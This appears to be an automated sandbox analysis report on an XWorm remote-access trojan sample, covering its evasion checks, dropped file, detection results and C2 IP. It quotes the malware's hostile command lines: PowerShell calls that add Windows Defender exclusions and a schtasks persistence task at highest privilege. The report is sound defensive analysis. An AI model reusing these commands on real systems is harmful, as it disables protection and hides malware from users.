                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX (99 identical entries)
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe	Process information set: NOOPENFILEERRORBOX (60 identical entries)

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController (11 identical entries)
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe	Memory allocated: D80000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe	Memory allocated: 1AC60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe	Memory allocated: 21B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe	Memory allocated: 1A3A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe	Memory allocated: DE0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe	Memory allocated: 1A890000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe	Memory allocated: 1150000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe	Memory allocated: 1B1D0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe	Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477 (4 identical entries)
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe	Thread delayed: delay time: 922337203685477 (3 identical entries)
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe	Window / User API: threadDelayed 8404
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe	Window / User API: threadDelayed 1444
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5700
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4111
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2587
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7023
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6817
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2775
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8138
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1456
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe TID: 3300	Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208	Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 404	Thread sleep count: 2587 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 404	Thread sleep count: 7023 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5348	Thread sleep time: -4611686018427385s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040	Thread sleep count: 6817 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040	Thread sleep count: 2775 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2564	Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5700	Thread sleep count: 8138 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4548	Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1420	Thread sleep count: 1456 > 30
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe TID: 2828	Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe TID: 2800	Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe TID: 3584	Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe	File Volume queried: C:\ FullSizeInformation (12 identical entries)
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe	File Volume queried: C:\ FullSizeInformation (3 identical entries)
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe	Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477 (4 identical entries)
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe	Thread delayed: delay time: 922337203685477 (3 identical entries)
                  Source: fjijTlM2tu.exe, 00000000.00000002.2932578473.000000001BA87000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe	Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe	Process token adjusted: Debug (2 identical entries)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug (4 identical entries)
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe	Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe	Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe'
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\localsys64.exe'
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\localsys64.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe'
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe'
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'fjijTlM2tu.exe'
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\localsys64.exe'
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'localsys64.exe'
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "localsys64" /tr "C:\Users\user\AppData\Roaming\localsys64.exe"
                  Source: fjijTlM2tu.exe, 00000000.00000002.2908372278.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                  Source: fjijTlM2tu.exe, 00000000.00000002.2908372278.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
                  Source: fjijTlM2tu.exe, 00000000.00000002.2908372278.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                  Source: fjijTlM2tu.exe, 00000000.00000002.2908372278.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager2y
                  Source: fjijTlM2tu.exe, 00000000.00000002.2908372278.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Queries volume information: C:\Users\user\Desktop\fjijTlM2tu.exe VolumeInformation
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe | Queries volume information: C:\Users\user\AppData\Roaming\localsys64.exe VolumeInformation
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: fjijTlM2tu.exe, 00000000.00000002.2937977048.000000001C740000.00000004.00000020.00020000.00000000.sdmp, fjijTlM2tu.exe, 00000000.00000002.2932578473.000000001BADE000.00000004.00000020.00020000.00000000.sdmp, fjijTlM2tu.exe, 00000000.00000002.2932578473.000000001BA30000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  Source: Yara match | File source: fjijTlM2tu.exe, type: SAMPLE
                  Source: Yara match | File source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.fjijTlM2tu.exe.12c69ac0.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.fjijTlM2tu.exe.710000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: fjijTlM2tu.exe PID: 6872, type: MEMORYSTR
                  Source: Yara match | File source: C:\Users\user\AppData\Roaming\localsys64.exe, type: DROPPED

                  Remote Access Functionality

                  Source: Yara match | File source: fjijTlM2tu.exe, type: SAMPLE
                  Source: Yara match | File source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.fjijTlM2tu.exe.12c69ac0.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.0.fjijTlM2tu.exe.710000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: fjijTlM2tu.exe PID: 6872, type: MEMORYSTR
                  Source: Yara match | File source: C:\Users\user\AppData\Roaming\localsys64.exe, type: DROPPED

                  Tactics and Techniques (matrix columns listed per tactic; the number after a technique is the count shown in the report)

                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                  Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                  Execution: Windows Management Instrumentation (11); Scheduled Task/Job (1); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                  Persistence: Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                  Privilege Escalation: Process Injection (12); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (21); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                  Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (131); Process Injection (12); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); Software Packing (2); DLL Side-Loading (1)
                  Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                  Discovery: Security Software Discovery (221); Process Discovery (2); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (13); Remote System Discovery; System Owner/User Discovery
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                  Collection: Input Capture (1); Archive Collected Data (11); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                  Command and Control: Encrypted Channel (1); Non-Standard Port (1); Application Layer Protocol (1); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                  Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                  Behavior Graph

                  Behavior Graph ID: 1539518
                  Sample: fjijTlM2tu.exe
                  Startdate: 22/10/2024
                  Architecture: WINDOWS
                  Score: 100
                  Signatures at start: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
                  Processes started at start: fjijTlM2tu.exe; localsys64.exe (three instances)
                  fjijTlM2tu.exe -> network: 147.185.221.22, ports 43768, 49759, 49795 (SALSGIVERUS, United States)
                  fjijTlM2tu.exe -> dropped file: C:\Users\user\AppData\...\localsys64.exe, PE32
                  fjijTlM2tu.exe -> signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; 2 other signatures
                  fjijTlM2tu.exe -> started: powershell.exe (three instances); 2 other processes
                  localsys64.exe -> signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                  powershell.exe -> signatures: Loading BitLocker PowerShell Module
                  powershell.exe -> started: conhost.exe (one per powershell.exe instance); the 2 other processes -> started: conhost.exe (two instances)

                  Source | Detection | Scanner | Label
                  fjijTlM2tu.exe | 79% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
                  fjijTlM2tu.exe | 100% | Avira | TR/Spy.Gen
                  fjijTlM2tu.exe | 100% | Joe Sandbox ML |
                  Source | Detection | Scanner | Label
                  C:\Users\user\AppData\Roaming\localsys64.exe | 100% | Avira | TR/Spy.Gen
                  C:\Users\user\AppData\Roaming\localsys64.exe | 100% | Joe Sandbox ML |
                  C:\Users\user\AppData\Roaming\localsys64.exe | 79% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                  No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
147.185.221.22 | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1750379814.000002AFA5FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1843905928.000001FCB52D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1992420947.0000020590071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.1729265140.000002AF96159000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789759074.000001FCA5489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1885697345.000002058022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.1729265140.000002AF96159000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789759074.000001FCA5489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1885697345.000002058022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.micom/pkiops/Docs/ry.htm0 | powershell.exe, 00000004.00000002.1856423064.000001FCBD850000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1750379814.000002AFA5FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1843905928.000001FCB52D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1992420947.0000020590071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
